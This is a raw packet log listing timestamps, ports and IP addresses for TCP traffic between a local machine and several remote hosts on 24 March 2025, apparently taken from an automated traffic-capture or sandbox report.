Mar 24, 2025 14:42:19.842433929 CET	49712	443	192.168.2.6	185.174.100.20
Mar 24, 2025 14:42:19.842855930 CET	443	49712	185.174.100.20	192.168.2.6
Mar 24, 2025 14:42:19.842873096 CET	443	49712	185.174.100.20	192.168.2.6
Mar 24, 2025 14:42:19.842932940 CET	49712	443	192.168.2.6	185.174.100.20
Mar 24, 2025 14:42:19.842950106 CET	443	49712	185.174.100.20	192.168.2.6
Mar 24, 2025 14:42:19.843010902 CET	49712	443	192.168.2.6	185.174.100.20
Mar 24, 2025 14:42:19.843343019 CET	443	49712	185.174.100.20	192.168.2.6
Mar 24, 2025 14:42:19.843369961 CET	443	49712	185.174.100.20	192.168.2.6
Mar 24, 2025 14:42:19.843406916 CET	49712	443	192.168.2.6	185.174.100.20
Mar 24, 2025 14:42:19.843422890 CET	443	49712	185.174.100.20	192.168.2.6
Mar 24, 2025 14:42:19.843450069 CET	49712	443	192.168.2.6	185.174.100.20
Mar 24, 2025 14:42:19.843455076 CET	443	49712	185.174.100.20	192.168.2.6
Mar 24, 2025 14:42:19.843489885 CET	49712	443	192.168.2.6	185.174.100.20
Mar 24, 2025 14:42:19.843516111 CET	49712	443	192.168.2.6	185.174.100.20
Mar 24, 2025 14:42:19.843774080 CET	49712	443	192.168.2.6	185.174.100.20
Mar 24, 2025 14:42:19.843806982 CET	443	49712	185.174.100.20	192.168.2.6
Mar 24, 2025 14:42:20.667162895 CET	49714	443	192.168.2.6	151.101.2.137
Mar 24, 2025 14:42:20.667202950 CET	443	49714	151.101.2.137	192.168.2.6
Mar 24, 2025 14:42:20.667289972 CET	49714	443	192.168.2.6	151.101.2.137
Mar 24, 2025 14:42:20.667449951 CET	49714	443	192.168.2.6	151.101.2.137
Mar 24, 2025 14:42:20.667467117 CET	443	49714	151.101.2.137	192.168.2.6
Mar 24, 2025 14:42:20.854630947 CET	443	49714	151.101.2.137	192.168.2.6
Mar 24, 2025 14:42:20.854707956 CET	49714	443	192.168.2.6	151.101.2.137
Mar 24, 2025 14:42:20.856055975 CET	49714	443	192.168.2.6	151.101.2.137
Mar 24, 2025 14:42:20.856077909 CET	443	49714	151.101.2.137	192.168.2.6
Mar 24, 2025 14:42:20.856328011 CET	443	49714	151.101.2.137	192.168.2.6
Mar 24, 2025 14:42:20.858665943 CET	49714	443	192.168.2.6	151.101.2.137
Mar 24, 2025 14:42:20.904328108 CET	443	49714	151.101.2.137	192.168.2.6
Mar 24, 2025 14:42:21.028847933 CET	443	49714	151.101.2.137	192.168.2.6
Mar 24, 2025 14:42:21.041243076 CET	443	49714	151.101.2.137	192.168.2.6
Mar 24, 2025 14:42:21.041261911 CET	443	49714	151.101.2.137	192.168.2.6
Mar 24, 2025 14:42:21.041306019 CET	49714	443	192.168.2.6	151.101.2.137
Mar 24, 2025 14:42:21.041331053 CET	443	49714	151.101.2.137	192.168.2.6
Mar 24, 2025 14:42:21.041362047 CET	49714	443	192.168.2.6	151.101.2.137
Mar 24, 2025 14:42:21.041379929 CET	49714	443	192.168.2.6	151.101.2.137
Mar 24, 2025 14:42:21.062318087 CET	443	49714	151.101.2.137	192.168.2.6
Mar 24, 2025 14:42:21.062338114 CET	443	49714	151.101.2.137	192.168.2.6
Mar 24, 2025 14:42:21.062459946 CET	49714	443	192.168.2.6	151.101.2.137
Mar 24, 2025 14:42:21.062479019 CET	443	49714	151.101.2.137	192.168.2.6
Mar 24, 2025 14:42:21.115298033 CET	49714	443	192.168.2.6	151.101.2.137
Mar 24, 2025 14:42:21.130676985 CET	443	49714	151.101.2.137	192.168.2.6
Mar 24, 2025 14:42:21.130688906 CET	443	49714	151.101.2.137	192.168.2.6
Mar 24, 2025 14:42:21.130717993 CET	443	49714	151.101.2.137	192.168.2.6
Mar 24, 2025 14:42:21.130769014 CET	49714	443	192.168.2.6	151.101.2.137
Mar 24, 2025 14:42:21.130784988 CET	443	49714	151.101.2.137	192.168.2.6
Mar 24, 2025 14:42:21.130820036 CET	49714	443	192.168.2.6	151.101.2.137
Mar 24, 2025 14:42:21.145653963 CET	443	49714	151.101.2.137	192.168.2.6
Mar 24, 2025 14:42:21.145678043 CET	443	49714	151.101.2.137	192.168.2.6
Mar 24, 2025 14:42:21.145770073 CET	49714	443	192.168.2.6	151.101.2.137
Mar 24, 2025 14:42:21.145778894 CET	443	49714	151.101.2.137	192.168.2.6
Mar 24, 2025 14:42:21.145823002 CET	49714	443	192.168.2.6	151.101.2.137
Mar 24, 2025 14:42:21.156286955 CET	443	49714	151.101.2.137	192.168.2.6
Mar 24, 2025 14:42:21.156316042 CET	443	49714	151.101.2.137	192.168.2.6
Mar 24, 2025 14:42:21.156354904 CET	49714	443	192.168.2.6	151.101.2.137
Mar 24, 2025 14:42:21.156363010 CET	443	49714	151.101.2.137	192.168.2.6
Mar 24, 2025 14:42:21.156400919 CET	49714	443	192.168.2.6	151.101.2.137
Mar 24, 2025 14:42:21.157682896 CET	443	49714	151.101.2.137	192.168.2.6
Mar 24, 2025 14:42:21.157757044 CET	49714	443	192.168.2.6	151.101.2.137
Mar 24, 2025 14:42:21.157757998 CET	443	49714	151.101.2.137	192.168.2.6
Mar 24, 2025 14:42:21.157799006 CET	49714	443	192.168.2.6	151.101.2.137
Mar 24, 2025 14:42:21.173949957 CET	49714	443	192.168.2.6	151.101.2.137
Mar 24, 2025 14:42:21.173971891 CET	443	49714	151.101.2.137	192.168.2.6
Mar 24, 2025 14:42:21.552145958 CET	49715	443	192.168.2.6	199.232.196.193
Mar 24, 2025 14:42:21.552184105 CET	443	49715	199.232.196.193	192.168.2.6
Mar 24, 2025 14:42:21.552261114 CET	49715	443	192.168.2.6	199.232.196.193
Mar 24, 2025 14:42:21.552504063 CET	49715	443	192.168.2.6	199.232.196.193
Mar 24, 2025 14:42:21.552512884 CET	443	49715	199.232.196.193	192.168.2.6
Mar 24, 2025 14:42:21.554521084 CET	49716	443	192.168.2.6	199.232.196.193
Mar 24, 2025 14:42:21.554557085 CET	443	49716	199.232.196.193	192.168.2.6
Mar 24, 2025 14:42:21.554624081 CET	49716	443	192.168.2.6	199.232.196.193
Mar 24, 2025 14:42:21.554893970 CET	49716	443	192.168.2.6	199.232.196.193
Mar 24, 2025 14:42:21.554912090 CET	443	49716	199.232.196.193	192.168.2.6
Mar 24, 2025 14:42:21.832349062 CET	443	49715	199.232.196.193	192.168.2.6
Mar 24, 2025 14:42:21.832422018 CET	49715	443	192.168.2.6	199.232.196.193
Mar 24, 2025 14:42:21.833673000 CET	443	49716	199.232.196.193	192.168.2.6
Mar 24, 2025 14:42:21.833729982 CET	49716	443	192.168.2.6	199.232.196.193
Mar 24, 2025 14:42:21.833859921 CET	49715	443	192.168.2.6	199.232.196.193
Mar 24, 2025 14:42:21.833868027 CET	443	49715	199.232.196.193	192.168.2.6
Mar 24, 2025 14:42:21.834081888 CET	443	49715	199.232.196.193	192.168.2.6
Mar 24, 2025 14:42:21.834778070 CET	49716	443	192.168.2.6	199.232.196.193
Mar 24, 2025 14:42:21.834784985 CET	443	49716	199.232.196.193	192.168.2.6
Mar 24, 2025 14:42:21.834990978 CET	443	49716	199.232.196.193	192.168.2.6
Mar 24, 2025 14:42:21.835076094 CET	49715	443	192.168.2.6	199.232.196.193
Mar 24, 2025 14:42:21.835199118 CET	49716	443	192.168.2.6	199.232.196.193
Mar 24, 2025 14:42:21.876316071 CET	443	49715	199.232.196.193	192.168.2.6
Mar 24, 2025 14:42:21.876317978 CET	443	49716	199.232.196.193	192.168.2.6
Mar 24, 2025 14:42:21.928554058 CET	443	49716	199.232.196.193	192.168.2.6
Mar 24, 2025 14:42:21.928757906 CET	443	49716	199.232.196.193	192.168.2.6
Mar 24, 2025 14:42:21.928792953 CET	49716	443	192.168.2.6	199.232.196.193
Mar 24, 2025 14:42:21.928793907 CET	443	49716	199.232.196.193	192.168.2.6
Mar 24, 2025 14:42:21.928805113 CET	443	49716	199.232.196.193	192.168.2.6
Mar 24, 2025 14:42:21.928843021 CET	49716	443	192.168.2.6	199.232.196.193
Mar 24, 2025 14:42:21.930329084 CET	443	49715	199.232.196.193	192.168.2.6
Mar 24, 2025 14:42:21.930536985 CET	443	49715	199.232.196.193	192.168.2.6
Mar 24, 2025 14:42:21.930561066 CET	443	49715	199.232.196.193	192.168.2.6
Mar 24, 2025 14:42:21.930604935 CET	49715	443	192.168.2.6	199.232.196.193
Mar 24, 2025 14:42:21.930613041 CET	443	49715	199.232.196.193	192.168.2.6
Mar 24, 2025 14:42:21.930649996 CET	49715	443	192.168.2.6	199.232.196.193
Mar 24, 2025 14:42:21.932054996 CET	443	49716	199.232.196.193	192.168.2.6
Mar 24, 2025 14:42:21.933605909 CET	443	49715	199.232.196.193	192.168.2.6
Mar 24, 2025 14:42:21.934820890 CET	443	49715	199.232.196.193	192.168.2.6
Mar 24, 2025 14:42:21.934892893 CET	49715	443	192.168.2.6	199.232.196.193
Mar 24, 2025 14:42:21.935192108 CET	443	49716	199.232.196.193	192.168.2.6
Mar 24, 2025 14:42:21.935221910 CET	443	49716	199.232.196.193	192.168.2.6
Mar 24, 2025 14:42:21.935269117 CET	49716	443	192.168.2.6	199.232.196.193
Mar 24, 2025 14:42:21.935275078 CET	443	49716	199.232.196.193	192.168.2.6
Mar 24, 2025 14:42:21.935897112 CET	49715	443	192.168.2.6	199.232.196.193
Mar 24, 2025 14:42:21.935909033 CET	443	49715	199.232.196.193	192.168.2.6
Mar 24, 2025 14:42:21.935916901 CET	49716	443	192.168.2.6	199.232.196.193
Mar 24, 2025 14:42:21.937664032 CET	443	49716	199.232.196.193	192.168.2.6
Mar 24, 2025 14:42:21.940933943 CET	443	49716	199.232.196.193	192.168.2.6
Mar 24, 2025 14:42:21.941001892 CET	49716	443	192.168.2.6	199.232.196.193
Mar 24, 2025 14:42:21.941008091 CET	443	49716	199.232.196.193	192.168.2.6
Mar 24, 2025 14:42:21.944128990 CET	443	49716	199.232.196.193	192.168.2.6
Mar 24, 2025 14:42:21.945337057 CET	49716	443	192.168.2.6	199.232.196.193
Mar 24, 2025 14:42:21.945342064 CET	443	49716	199.232.196.193	192.168.2.6
Mar 24, 2025 14:42:21.947319984 CET	443	49716	199.232.196.193	192.168.2.6
Mar 24, 2025 14:42:21.948463917 CET	49716	443	192.168.2.6	199.232.196.193
Mar 24, 2025 14:42:21.948470116 CET	443	49716	199.232.196.193	192.168.2.6
Mar 24, 2025 14:42:21.953202009 CET	443	49716	199.232.196.193	192.168.2.6
Mar 24, 2025 14:42:21.953229904 CET	443	49716	199.232.196.193	192.168.2.6
Mar 24, 2025 14:42:21.953272104 CET	49716	443	192.168.2.6	199.232.196.193
Mar 24, 2025 14:42:21.953277111 CET	443	49716	199.232.196.193	192.168.2.6
Mar 24, 2025 14:42:21.953314066 CET	49716	443	192.168.2.6	199.232.196.193
Mar 24, 2025 14:42:21.956136942 CET	443	49716	199.232.196.193	192.168.2.6
Mar 24, 2025 14:42:21.959261894 CET	443	49716	199.232.196.193	192.168.2.6
Mar 24, 2025 14:42:21.959342957 CET	443	49716	199.232.196.193	192.168.2.6
Mar 24, 2025 14:42:21.959351063 CET	49716	443	192.168.2.6	199.232.196.193
Mar 24, 2025 14:42:21.959355116 CET	443	49716	199.232.196.193	192.168.2.6
Mar 24, 2025 14:42:21.959395885 CET	49716	443	192.168.2.6	199.232.196.193
Mar 24, 2025 14:42:21.963603020 CET	443	49716	199.232.196.193	192.168.2.6
Mar 24, 2025 14:42:21.965939999 CET	443	49716	199.232.196.193	192.168.2.6
Mar 24, 2025 14:42:21.966259003 CET	49716	443	192.168.2.6	199.232.196.193
Mar 24, 2025 14:42:21.966264009 CET	443	49716	199.232.196.193	192.168.2.6
Mar 24, 2025 14:42:22.014931917 CET	49716	443	192.168.2.6	199.232.196.193
Mar 24, 2025 14:42:22.014938116 CET	443	49716	199.232.196.193	192.168.2.6
Mar 24, 2025 14:42:22.017321110 CET	443	49716	199.232.196.193	192.168.2.6
Mar 24, 2025 14:42:22.018341064 CET	49716	443	192.168.2.6	199.232.196.193
Mar 24, 2025 14:42:22.018346071 CET	443	49716	199.232.196.193	192.168.2.6
Mar 24, 2025 14:42:22.018815994 CET	443	49716	199.232.196.193	192.168.2.6
Mar 24, 2025 14:42:22.018878937 CET	49716	443	192.168.2.6	199.232.196.193
Mar 24, 2025 14:42:22.018883944 CET	443	49716	199.232.196.193	192.168.2.6
Mar 24, 2025 14:42:22.021553040 CET	443	49716	199.232.196.193	192.168.2.6
Mar 24, 2025 14:42:22.021755934 CET	49716	443	192.168.2.6	199.232.196.193
Mar 24, 2025 14:42:22.021761894 CET	443	49716	199.232.196.193	192.168.2.6
Mar 24, 2025 14:42:22.027097940 CET	443	49716	199.232.196.193	192.168.2.6
Mar 24, 2025 14:42:22.027143002 CET	49716	443	192.168.2.6	199.232.196.193
Mar 24, 2025 14:42:22.027147055 CET	443	49716	199.232.196.193	192.168.2.6
Mar 24, 2025 14:42:22.029652119 CET	443	49716	199.232.196.193	192.168.2.6
Mar 24, 2025 14:42:22.029683113 CET	443	49716	199.232.196.193	192.168.2.6
Mar 24, 2025 14:42:22.029691935 CET	49716	443	192.168.2.6	199.232.196.193
Mar 24, 2025 14:42:22.029699087 CET	443	49716	199.232.196.193	192.168.2.6
Mar 24, 2025 14:42:22.029736042 CET	49716	443	192.168.2.6	199.232.196.193
Mar 24, 2025 14:42:22.029741049 CET	443	49716	199.232.196.193	192.168.2.6
Mar 24, 2025 14:42:22.029751062 CET	443	49716	199.232.196.193	192.168.2.6
Mar 24, 2025 14:42:22.029782057 CET	49716	443	192.168.2.6	199.232.196.193
Mar 24, 2025 14:42:22.041529894 CET	49719	443	192.168.2.6	199.232.196.193
Mar 24, 2025 14:42:22.041567087 CET	443	49719	199.232.196.193	192.168.2.6
Mar 24, 2025 14:42:22.041632891 CET	49719	443	192.168.2.6	199.232.196.193
Mar 24, 2025 14:42:22.041743040 CET	49716	443	192.168.2.6	199.232.196.193
Mar 24, 2025 14:42:22.041750908 CET	443	49716	199.232.196.193	192.168.2.6
Mar 24, 2025 14:42:22.042454004 CET	49719	443	192.168.2.6	199.232.196.193
Mar 24, 2025 14:42:22.042467117 CET	443	49719	199.232.196.193	192.168.2.6
Mar 24, 2025 14:42:22.046536922 CET	49720	443	192.168.2.6	199.232.196.193
Mar 24, 2025 14:42:22.046576977 CET	443	49720	199.232.196.193	192.168.2.6
Mar 24, 2025 14:42:22.046972990 CET	49720	443	192.168.2.6	199.232.196.193
Mar 24, 2025 14:42:22.047220945 CET	49720	443	192.168.2.6	199.232.196.193
Mar 24, 2025 14:42:22.047233105 CET	443	49720	199.232.196.193	192.168.2.6
Mar 24, 2025 14:42:22.232999086 CET	443	49719	199.232.196.193	192.168.2.6
Mar 24, 2025 14:42:22.233092070 CET	49719	443	192.168.2.6	199.232.196.193
Mar 24, 2025 14:42:22.233556986 CET	49719	443	192.168.2.6	199.232.196.193
Mar 24, 2025 14:42:22.233561993 CET	443	49719	199.232.196.193	192.168.2.6
Mar 24, 2025 14:42:22.233783960 CET	443	49719	199.232.196.193	192.168.2.6
Mar 24, 2025 14:42:22.234064102 CET	49719	443	192.168.2.6	199.232.196.193
Mar 24, 2025 14:42:22.237545967 CET	443	49720	199.232.196.193	192.168.2.6
Mar 24, 2025 14:42:22.237628937 CET	49720	443	192.168.2.6	199.232.196.193
Mar 24, 2025 14:42:22.238106012 CET	49720	443	192.168.2.6	199.232.196.193
Mar 24, 2025 14:42:22.238114119 CET	443	49720	199.232.196.193	192.168.2.6
Mar 24, 2025 14:42:22.238336086 CET	443	49720	199.232.196.193	192.168.2.6
Mar 24, 2025 14:42:22.240559101 CET	49720	443	192.168.2.6	199.232.196.193
Mar 24, 2025 14:42:22.276318073 CET	443	49719	199.232.196.193	192.168.2.6
Mar 24, 2025 14:42:22.284321070 CET	443	49720	199.232.196.193	192.168.2.6
Mar 24, 2025 14:42:22.418817997 CET	443	49719	199.232.196.193	192.168.2.6
Mar 24, 2025 14:42:22.418929100 CET	443	49719	199.232.196.193	192.168.2.6
Mar 24, 2025 14:42:22.418978930 CET	443	49719	199.232.196.193	192.168.2.6
Mar 24, 2025 14:42:22.418998957 CET	49719	443	192.168.2.6	199.232.196.193
Mar 24, 2025 14:42:22.419024944 CET	443	49719	199.232.196.193	192.168.2.6
Mar 24, 2025 14:42:22.419068098 CET	443	49719	199.232.196.193	192.168.2.6
Mar 24, 2025 14:42:22.419110060 CET	49719	443	192.168.2.6	199.232.196.193
Mar 24, 2025 14:42:22.419116974 CET	443	49719	199.232.196.193	192.168.2.6
Mar 24, 2025 14:42:22.419147968 CET	49719	443	192.168.2.6	199.232.196.193
Mar 24, 2025 14:42:22.419178009 CET	443	49719	199.232.196.193	192.168.2.6
Mar 24, 2025 14:42:22.419214010 CET	49719	443	192.168.2.6	199.232.196.193
Mar 24, 2025 14:42:22.421308041 CET	443	49720	199.232.196.193	192.168.2.6
Mar 24, 2025 14:42:22.421544075 CET	443	49720	199.232.196.193	192.168.2.6
Mar 24, 2025 14:42:22.421598911 CET	443	49720	199.232.196.193	192.168.2.6
Mar 24, 2025 14:42:22.421634912 CET	443	49720	199.232.196.193	192.168.2.6
Mar 24, 2025 14:42:22.421648026 CET	49720	443	192.168.2.6	199.232.196.193
Mar 24, 2025 14:42:22.421665907 CET	443	49720	199.232.196.193	192.168.2.6
Mar 24, 2025 14:42:22.421691895 CET	49720	443	192.168.2.6	199.232.196.193
Mar 24, 2025 14:42:22.421731949 CET	443	49720	199.232.196.193	192.168.2.6
Mar 24, 2025 14:42:22.421763897 CET	443	49720	199.232.196.193	192.168.2.6
Mar 24, 2025 14:42:22.421773911 CET	49720	443	192.168.2.6	199.232.196.193
Mar 24, 2025 14:42:22.421788931 CET	443	49720	199.232.196.193	192.168.2.6
Mar 24, 2025 14:42:22.421861887 CET	49720	443	192.168.2.6	199.232.196.193
Mar 24, 2025 14:42:22.422487020 CET	49719	443	192.168.2.6	199.232.196.193
Mar 24, 2025 14:42:22.422499895 CET	443	49719	199.232.196.193	192.168.2.6
Mar 24, 2025 14:42:22.425153017 CET	443	49720	199.232.196.193	192.168.2.6
Mar 24, 2025 14:42:22.428647995 CET	443	49720	199.232.196.193	192.168.2.6
Mar 24, 2025 14:42:22.428781986 CET	49720	443	192.168.2.6	199.232.196.193
Mar 24, 2025 14:42:22.428790092 CET	443	49720	199.232.196.193	192.168.2.6
Mar 24, 2025 14:42:22.432018042 CET	443	49720	199.232.196.193	192.168.2.6
Mar 24, 2025 14:42:22.432131052 CET	49720	443	192.168.2.6	199.232.196.193
Mar 24, 2025 14:42:22.432137012 CET	443	49720	199.232.196.193	192.168.2.6
Mar 24, 2025 14:42:22.434688091 CET	443	49720	199.232.196.193	192.168.2.6
Mar 24, 2025 14:42:22.434751034 CET	49720	443	192.168.2.6	199.232.196.193
Mar 24, 2025 14:42:22.434758902 CET	443	49720	199.232.196.193	192.168.2.6
Mar 24, 2025 14:42:22.440217972 CET	443	49720	199.232.196.193	192.168.2.6
Mar 24, 2025 14:42:22.440270901 CET	49720	443	192.168.2.6	199.232.196.193
Mar 24, 2025 14:42:22.440279007 CET	443	49720	199.232.196.193	192.168.2.6
Mar 24, 2025 14:42:22.443458080 CET	443	49720	199.232.196.193	192.168.2.6
Mar 24, 2025 14:42:22.443505049 CET	443	49720	199.232.196.193	192.168.2.6
Mar 24, 2025 14:42:22.443555117 CET	49720	443	192.168.2.6	199.232.196.193
Mar 24, 2025 14:42:22.443562984 CET	443	49720	199.232.196.193	192.168.2.6
Mar 24, 2025 14:42:22.443599939 CET	49720	443	192.168.2.6	199.232.196.193
Mar 24, 2025 14:42:22.446147919 CET	443	49720	199.232.196.193	192.168.2.6
Mar 24, 2025 14:42:22.448992014 CET	443	49720	199.232.196.193	192.168.2.6
Mar 24, 2025 14:42:22.449032068 CET	49720	443	192.168.2.6	199.232.196.193
Mar 24, 2025 14:42:22.449040890 CET	443	49720	199.232.196.193	192.168.2.6
Mar 24, 2025 14:42:22.452277899 CET	443	49720	199.232.196.193	192.168.2.6
Mar 24, 2025 14:42:22.452318907 CET	49720	443	192.168.2.6	199.232.196.193
Mar 24, 2025 14:42:22.452327013 CET	443	49720	199.232.196.193	192.168.2.6
Mar 24, 2025 14:42:22.498260021 CET	49720	443	192.168.2.6	199.232.196.193
Mar 24, 2025 14:42:22.498277903 CET	443	49720	199.232.196.193	192.168.2.6
Mar 24, 2025 14:42:22.512521982 CET	443	49720	199.232.196.193	192.168.2.6
Mar 24, 2025 14:42:22.512589931 CET	49720	443	192.168.2.6	199.232.196.193
Mar 24, 2025 14:42:22.512609005 CET	443	49720	199.232.196.193	192.168.2.6
Mar 24, 2025 14:42:22.514358044 CET	443	49720	199.232.196.193	192.168.2.6
Mar 24, 2025 14:42:22.514420986 CET	49720	443	192.168.2.6	199.232.196.193
Mar 24, 2025 14:42:22.514430046 CET	443	49720	199.232.196.193	192.168.2.6
Mar 24, 2025 14:42:22.518182993 CET	443	49720	199.232.196.193	192.168.2.6
Mar 24, 2025 14:42:22.518225908 CET	49720	443	192.168.2.6	199.232.196.193
Mar 24, 2025 14:42:22.518235922 CET	443	49720	199.232.196.193	192.168.2.6
Mar 24, 2025 14:42:22.521202087 CET	443	49720	199.232.196.193	192.168.2.6
Mar 24, 2025 14:42:22.521239042 CET	443	49720	199.232.196.193	192.168.2.6
Mar 24, 2025 14:42:22.521249056 CET	49720	443	192.168.2.6	199.232.196.193
Mar 24, 2025 14:42:22.521258116 CET	443	49720	199.232.196.193	192.168.2.6
Mar 24, 2025 14:42:22.521291971 CET	49720	443	192.168.2.6	199.232.196.193
Mar 24, 2025 14:42:22.522809029 CET	443	49720	199.232.196.193	192.168.2.6
Mar 24, 2025 14:42:22.522913933 CET	443	49720	199.232.196.193	192.168.2.6
Mar 24, 2025 14:42:22.522953987 CET	49720	443	192.168.2.6	199.232.196.193
Mar 24, 2025 14:42:22.523154974 CET	49720	443	192.168.2.6	199.232.196.193
Mar 24, 2025 14:42:22.523166895 CET	443	49720	199.232.196.193	192.168.2.6
Mar 24, 2025 14:42:26.038842916 CET	443	49705	142.251.40.196	192.168.2.6
Mar 24, 2025 14:42:26.039328098 CET	443	49705	142.251.40.196	192.168.2.6
Mar 24, 2025 14:42:26.039395094 CET	49705	443	192.168.2.6	142.251.40.196
Mar 24, 2025 14:42:26.108650923 CET	49705	443	192.168.2.6	142.251.40.196
Mar 24, 2025 14:42:26.108689070 CET	443	49705	142.251.40.196	192.168.2.6
Mar 24, 2025 14:42:28.242970943 CET	80	49686	23.203.176.221	192.168.2.6
Mar 24, 2025 14:42:28.243187904 CET	49686	80	192.168.2.6	23.203.176.221
Mar 24, 2025 14:42:28.243189096 CET	49686	80	192.168.2.6	23.203.176.221
Mar 24, 2025 14:42:28.334337950 CET	80	49686	23.203.176.221	192.168.2.6
Mar 24, 2025 14:42:39.471920967 CET	49725	8233	192.168.2.6	185.174.100.76
Mar 24, 2025 14:42:39.629302025 CET	8233	49725	185.174.100.76	192.168.2.6
Mar 24, 2025 14:42:39.629453897 CET	49725	8233	192.168.2.6	185.174.100.76
Mar 24, 2025 14:42:39.662261009 CET	49725	8233	192.168.2.6	185.174.100.76
Mar 24, 2025 14:42:39.819785118 CET	8233	49725	185.174.100.76	192.168.2.6
Mar 24, 2025 14:42:39.819803953 CET	8233	49725	185.174.100.76	192.168.2.6
Mar 24, 2025 14:42:39.820018053 CET	49725	8233	192.168.2.6	185.174.100.76
Mar 24, 2025 14:42:39.886132002 CET	49725	8233	192.168.2.6	185.174.100.76
Mar 24, 2025 14:42:39.912597895 CET	49725	8233	192.168.2.6	185.174.100.76
Mar 24, 2025 14:42:40.046112061 CET	8233	49725	185.174.100.76	192.168.2.6
Mar 24, 2025 14:42:40.072657108 CET	8233	49725	185.174.100.76	192.168.2.6
Mar 24, 2025 14:42:40.072726011 CET	49725	8233	192.168.2.6	185.174.100.76
Mar 24, 2025 14:42:40.180164099 CET	49726	443	192.168.2.6	172.67.74.152
Mar 24, 2025 14:42:40.180219889 CET	443	49726	172.67.74.152	192.168.2.6
Mar 24, 2025 14:42:40.180320024 CET	49726	443	192.168.2.6	172.67.74.152
Mar 24, 2025 14:42:40.180444956 CET	49726	443	192.168.2.6	172.67.74.152
Mar 24, 2025 14:42:40.180454016 CET	443	49726	172.67.74.152	192.168.2.6
Mar 24, 2025 14:42:40.407762051 CET	443	49726	172.67.74.152	192.168.2.6
Mar 24, 2025 14:42:40.407860994 CET	49726	443	192.168.2.6	172.67.74.152
Mar 24, 2025 14:42:40.409116030 CET	49726	443	192.168.2.6	172.67.74.152
Mar 24, 2025 14:42:40.409126043 CET	443	49726	172.67.74.152	192.168.2.6
Mar 24, 2025 14:42:40.409560919 CET	443	49726	172.67.74.152	192.168.2.6
Mar 24, 2025 14:42:40.409818888 CET	49726	443	192.168.2.6	172.67.74.152
Mar 24, 2025 14:42:40.456340075 CET	443	49726	172.67.74.152	192.168.2.6
Mar 24, 2025 14:42:40.654341936 CET	443	49726	172.67.74.152	192.168.2.6
Mar 24, 2025 14:42:40.654422045 CET	443	49726	172.67.74.152	192.168.2.6
Mar 24, 2025 14:42:40.654481888 CET	49726	443	192.168.2.6	172.67.74.152
Mar 24, 2025 14:42:40.698383093 CET	49726	443	192.168.2.6	172.67.74.152
Mar 24, 2025 14:42:40.698417902 CET	443	49726	172.67.74.152	192.168.2.6
Mar 24, 2025 14:42:40.700612068 CET	49725	8233	192.168.2.6	185.174.100.76
Mar 24, 2025 14:42:40.808518887 CET	49727	443	192.168.2.6	172.67.74.152
Mar 24, 2025 14:42:40.808552027 CET	443	49727	172.67.74.152	192.168.2.6
Mar 24, 2025 14:42:40.808624983 CET	49727	443	192.168.2.6	172.67.74.152
Mar 24, 2025 14:42:40.808803082 CET	49727	443	192.168.2.6	172.67.74.152
Mar 24, 2025 14:42:40.808815002 CET	443	49727	172.67.74.152	192.168.2.6
Mar 24, 2025 14:42:40.894972086 CET	8233	49725	185.174.100.76	192.168.2.6
Mar 24, 2025 14:42:41.016344070 CET	443	49727	172.67.74.152	192.168.2.6
Mar 24, 2025 14:42:41.016447067 CET	49727	443	192.168.2.6	172.67.74.152
Mar 24, 2025 14:42:41.017038107 CET	49727	443	192.168.2.6	172.67.74.152
Mar 24, 2025 14:42:41.017050028 CET	443	49727	172.67.74.152	192.168.2.6
Mar 24, 2025 14:42:41.017880917 CET	443	49727	172.67.74.152	192.168.2.6
Mar 24, 2025 14:42:41.018140078 CET	49727	443	192.168.2.6	172.67.74.152
Mar 24, 2025 14:42:41.060340881 CET	443	49727	172.67.74.152	192.168.2.6
Mar 24, 2025 14:42:41.257775068 CET	443	49727	172.67.74.152	192.168.2.6
Mar 24, 2025 14:42:41.257853985 CET	443	49727	172.67.74.152	192.168.2.6
Mar 24, 2025 14:42:41.257910013 CET	49727	443	192.168.2.6	172.67.74.152
Mar 24, 2025 14:42:41.258913040 CET	49727	443	192.168.2.6	172.67.74.152
Mar 24, 2025 14:42:41.258924007 CET	443	49727	172.67.74.152	192.168.2.6
Mar 24, 2025 14:42:46.497190952 CET	80	49691	23.203.176.221	192.168.2.6
Mar 24, 2025 14:42:46.497448921 CET	49691	80	192.168.2.6	23.203.176.221
Mar 24, 2025 14:42:47.571225882 CET	49728	8233	192.168.2.6	185.174.100.76
Mar 24, 2025 14:42:47.725194931 CET	8233	49728	185.174.100.76	192.168.2.6
Mar 24, 2025 14:42:47.725322008 CET	49728	8233	192.168.2.6	185.174.100.76
Mar 24, 2025 14:42:47.725620031 CET	49728	8233	192.168.2.6	185.174.100.76
Mar 24, 2025 14:42:47.877791882 CET	8233	49728	185.174.100.76	192.168.2.6
Mar 24, 2025 14:42:47.878135920 CET	49728	8233	192.168.2.6	185.174.100.76
Mar 24, 2025 14:42:47.878361940 CET	49728	8233	192.168.2.6	185.174.100.76
Mar 24, 2025 14:42:47.918447971 CET	49729	443	192.168.2.6	104.168.138.190
Mar 24, 2025 14:42:47.918504953 CET	443	49729	104.168.138.190	192.168.2.6
Mar 24, 2025 14:42:47.918575048 CET	49729	443	192.168.2.6	104.168.138.190
Mar 24, 2025 14:42:47.918836117 CET	49729	443	192.168.2.6	104.168.138.190
Mar 24, 2025 14:42:47.918855906 CET	443	49729	104.168.138.190	192.168.2.6
Mar 24, 2025 14:42:48.030174017 CET	8233	49728	185.174.100.76	192.168.2.6
Mar 24, 2025 14:42:48.030497074 CET	8233	49728	185.174.100.76	192.168.2.6
Mar 24, 2025 14:42:48.033746958 CET	49730	443	192.168.2.6	172.67.74.152
Mar 24, 2025 14:42:48.033797026 CET	443	49730	172.67.74.152	192.168.2.6
Mar 24, 2025 14:42:48.033905029 CET	49730	443	192.168.2.6	172.67.74.152
Mar 24, 2025 14:42:48.034039021 CET	49730	443	192.168.2.6	172.67.74.152
Mar 24, 2025 14:42:48.034051895 CET	443	49730	172.67.74.152	192.168.2.6
Mar 24, 2025 14:42:48.079463959 CET	49728	8233	192.168.2.6	185.174.100.76
Mar 24, 2025 14:42:48.238703966 CET	443	49730	172.67.74.152	192.168.2.6
Mar 24, 2025 14:42:48.238990068 CET	49730	443	192.168.2.6	172.67.74.152
Mar 24, 2025 14:42:48.239032984 CET	443	49730	172.67.74.152	192.168.2.6
Mar 24, 2025 14:42:48.239156961 CET	49730	443	192.168.2.6	172.67.74.152
Mar 24, 2025 14:42:48.239162922 CET	443	49730	172.67.74.152	192.168.2.6
Mar 24, 2025 14:42:48.389839888 CET	443	49729	104.168.138.190	192.168.2.6
Mar 24, 2025 14:42:48.389995098 CET	49729	443	192.168.2.6	104.168.138.190
Mar 24, 2025 14:42:48.391110897 CET	49729	443	192.168.2.6	104.168.138.190
